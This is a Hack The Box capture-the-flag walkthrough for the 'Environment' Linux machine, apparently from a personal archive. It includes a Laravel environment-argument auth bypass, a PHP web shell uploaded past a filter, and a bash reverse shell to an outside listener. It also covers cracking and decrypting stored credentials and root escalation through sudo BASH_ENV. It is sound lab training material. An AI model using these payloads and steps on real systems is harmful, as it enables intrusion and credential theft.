> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2025-09-06

Hack The Box — Environment (Linux)

Laravel auth bypass to preprod session, file upload extension bypass for RCE, credential recovery from SQLite and GPG vault, and root escalation via sudo BASH_ENV abuse in systeminfo wrapper.

Target

  • IP: 10.10.11.67

Recon

sudo nmap -sC -sV 10.10.11.67 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Did not follow redirect to http://environment.htb
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add environment.htb to /etc/hosts.

gobuster dir -u 'http://environment.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50
 --exclude-length 153 -x php
/index.php            (Status: 200) [Size: 4602]
/login                (Status: 200) [Size: 2391]
/logout               (Status: 302) [Size: 358] [--> http://environment.htb/login]
/upload               (Status: 405) [Size: 244852]
/mailing              (Status: 405) [Size: 244854]
/up                   (Status: 200) [Size: 2125]
/storage              (Status: 301) [Size: 169] [--> http://environment.htb/storage/]
/build                (Status: 301) [Size: 169] [--> http://environment.htb/build/]
/vendor               (Status: 301) [Size: 169] [--> http://environment.htb/vendor/]

Go to http://environment.htb/login.

There is a login form.

Enter random credentials.

Intercept request with Burp.

Modify remember parameter to a random value, for example aaaaa.

As response we get an error page showing PHP and Laravel versions:

PHP 8.2.28 — Laravel 11.30.0

And it also shows a code snippet:

    if(App::environment() == "preprod") { //QOL: login directly as me in dev/local/preprod envs
        $request->session()->regenerate();
        $request->session()->put('user_id', 1);
        return redirect('/management/dashboard');
    }

    $user = User::where('email', $email)->first();

There is a vulnerability with an exploit: - https://github.com/Nyamort/CVE-2024-50340

Intercept the login request with Burp.

Set first line to:

POST /login?--env=preprod HTTP/1.1

Send request.

We arrive at http://environment.htb/management/dashboard.

Go to Profile.

We can modify profile image.

If we upload a random file hello.txt, it says: Invalid file detected.

There is a vulnerability: CVE-2024-21546.

Create a PNG image.

See script attachments/create_png.py.

python3 create_png.py

A file test.png is created.

Upload test.png.

Intercept request with Burp.

Change filename to test.php. (note the trailing dot).

Append this line to the image data:

<?php system($_GET["cmd"]); ?>

Send request.

Go to http://environment.htb/storage/files/test.php?cmd=id.

We see command output of id.

Start netcat listener:

nc -vlnp 4444

Go to:

http://environment.htb/storage/files/test.php?cmd=bash%20-c%20%27bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.150%2f4444%200%3e%261%27

We get a reverse shell as user www-data.

cd /var/www/app/database
sqlite3 database.sqlite
.tables
select * from users;
1|Hish|hish@environment.htb||$2y$12$QPbeVM.u7VbN9KCeAJ.JA.WfWQVWQg0LopB9ILcC7akZ.q641r1gi||2025-01-07 01:51:54|2025-01-12 01:01:48|hish.png
2|Jono|jono@environment.htb||$2y$12$i.h1rug6NfC73tTb8XF0Y.W0GDBjrY5FBfsyX2wOAXfDWOUk9dphm||2025-01-07 01:52:35|2025-01-07 01:52:35|jono.png
3|Bethany|bethany@environment.htb||$2y$12$6kbg21YDMaGrt.iCUkP/s.yLEGAE2S78gWt.6MAODUD3JXFMS13J.||2025-01-07 01:53:18|2025-01-07 01:53:18|bethany.png

Put hash of hish in a hash file.

./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt

It does not crack.

ls -la /home/hish
drwxr-xr-x 5 hish hish 4096 May 11 05:00 .
drwxr-xr-x 3 root root 4096 Jan 12 11:51 ..
lrwxrwxrwx 1 root root    9 Apr  7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish  220 Jan  6 21:28 .bash_logout
-rw-r--r-- 1 hish hish 3526 Jan 12 14:42 .bashrc
drwxr-xr-x 4 hish hish 4096 May 11 07:00 .gnupg
drwxr-xr-x 3 hish hish 4096 Jan  6 21:43 .local
-rw-r--r-- 1 hish hish  807 Jan  6 21:28 .profile
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 backup
-rw-r--r-- 1 root hish   33 May 10 22:16 user.txt

ls -la /home/hish/backup
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 .
drwxr-xr-x 5 hish hish 4096 May 11 05:00 ..
-rw-r--r-- 1 hish hish  430 May 11 07:00 keyvault.gpg

ls -la /home/hish/.gnupg
drwxr-xr-x 4 hish hish 4096 May 11 07:00 .
drwxr-xr-x 5 hish hish 4096 May 11 05:00 ..
drwxr-xr-x 2 hish hish 4096 May 11 07:00 openpgp-revocs.d
drwxr-x--- 2 hish hish 4096 May 11 07:00 private-keys-v1.d
-rwxr-xr-x 1 hish hish 1446 Jan 12 03:13 pubring.kbx
-rwxr-xr-x 1 hish hish   32 Jan 12 03:11 pubring.kbx~
-rwxr-xr-x 1 hish hish  600 Jan 12 11:48 random_seed
-rwxr-xr-x 1 hish hish 1280 Jan 12 11:48 trustdb.gpg

We do not have access to private keys.

But we can do this:

cp -r /home/hish/.gnupg /tmp/test
chmod -R 700 /tmp/test
gpg --homedir /tmp/test --list-secret-keys
gpg --homedir /tmp/test --output /dev/shm/message.txt --decrypt /home/hish/backup/keyvault.gpg

cat /dev/shm/message.txt
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

ssh hish@environment.htb

Enter password marineSPm@ster!!.

We get a shell as user hish.

sudo -l
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo

file /usr/bin/systeminfo
/usr/bin/systeminfo: Bourne-Again shell script, ASCII text executable

Let us check what BASH_ENV and ENV mean.

BASH_ENV If this variable is set when Bash is invoked to execute a shell script, its value is expanded and used as the name of a startup file to read before executing the script.

ENV When invoked as an interactive shell with the name sh, Bash looks for the variable ENV, expands its value if it is defined, and uses the expanded value as the name of a file to read and execute.

Create file /dev/shm/myscript.sh with content:

#!/bin/bash
bash

Make it executable:

chmod +x /dev/shm/myscript.sh

Now run:

export BASH_ENV=/dev/shm/myscript.sh
sudo systeminfo

We get a shell as user root.